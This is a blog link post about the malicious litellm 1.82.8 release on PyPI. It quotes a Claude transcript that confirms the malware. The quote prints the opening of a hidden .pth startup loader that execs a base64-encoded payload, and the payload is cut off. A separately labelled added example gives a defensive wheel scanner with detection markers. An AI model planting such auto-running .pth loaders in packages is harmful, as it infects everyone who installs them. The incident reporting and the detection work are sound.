My minute-by-minute response to the LiteLLM malware attack
My minute-by-minute response to the LiteLLM malware attack (https://futuresearch.ai/blog/litellm-attack-transcript/)
Callum McMahon reported the LiteLLM malware attack (https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:
Confirmed. Fresh download from PyPI right now in an isolated Docker container:
Inspecting: litellm-1.82.8-py3-none-any.whl
  FOUND: litellm_init.pth
  SIZE: 34628 bytes
  FIRST 200 CHARS:
  import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl…
The malicious litellm==1.82.8 is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.
I was chuffed to see Callum use my claude-code-transcripts (https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation.
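The check shown in the transcript can be repeated without installing the package. The following is an added example, not code from the original post or the transcript: it opens a wheel as a zip archive and reports any .pth lines that Python's site module would execute at interpreter startup. The sample wheel, its file names, the no-op payload and the MARKERS list are constructed for illustration.

```python
import io
import zipfile

# Substrings worth a closer look inside an executable .pth line (assumed list, not exhaustive).
MARKERS = ("subprocess", "exec(", "eval(", "base64", "os.system")

def scan_wheel(wheel_bytes):
    """Return one finding per .pth line that site.py would exec() at startup."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as whl:
        for info in whl.infolist():
            if not info.filename.endswith(".pth"):
                continue
            text = whl.read(info).decode("utf-8", errors="replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                # site.py executes .pth lines starting with "import " or "import\t";
                # other non-comment lines are only appended to sys.path.
                if line.startswith(("import ", "import\t")):
                    findings.append({
                        "file": info.filename,
                        "size": info.file_size,
                        "line": lineno,
                        "first_200": line[:200],
                        "suspicious": any(m in line for m in MARKERS),
                    })
    return findings

def build_sample_wheel():
    """Constructed sample: a tiny wheel-shaped zip with one benign and one executable .pth."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as whl:
        whl.writestr("demo_pkg/__init__.py", "")
        # Path-only .pth: adds a directory to sys.path, runs no code.
        whl.writestr("demo_paths.pth", "./vendored\n")
        # Executable .pth with the same shape as the reported file; payload decodes to "pass".
        whl.writestr("demo_init.pth",
                     "import base64; exec(base64.b64decode('cGFzcw=='))\n")
    return buf.getvalue()

if __name__ == "__main__":
    for finding in scan_wheel(build_sample_wheel()):
        print(finding)
```

To scan a real download, pass the bytes of a wheel fetched with `pip download --no-deps` to `scan_wheel`; nothing in the archive is imported or executed.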
Via Hacker News (https://news.ycombinator.com/item?id=47531967)
Tags: pypi (https://simonwillison.net/tags/pypi), security (https://simonwillison.net/tags/security), ai (https://simonwillison.net/tags/ai), generative-ai (https://simonwillison.net/tags/generative-ai), llms (https://simonwillison.net/tags/llms), claude (https://simonwillison.net/tags/claude), supply-chain (https://simonwillison.net/tags/supply-chain)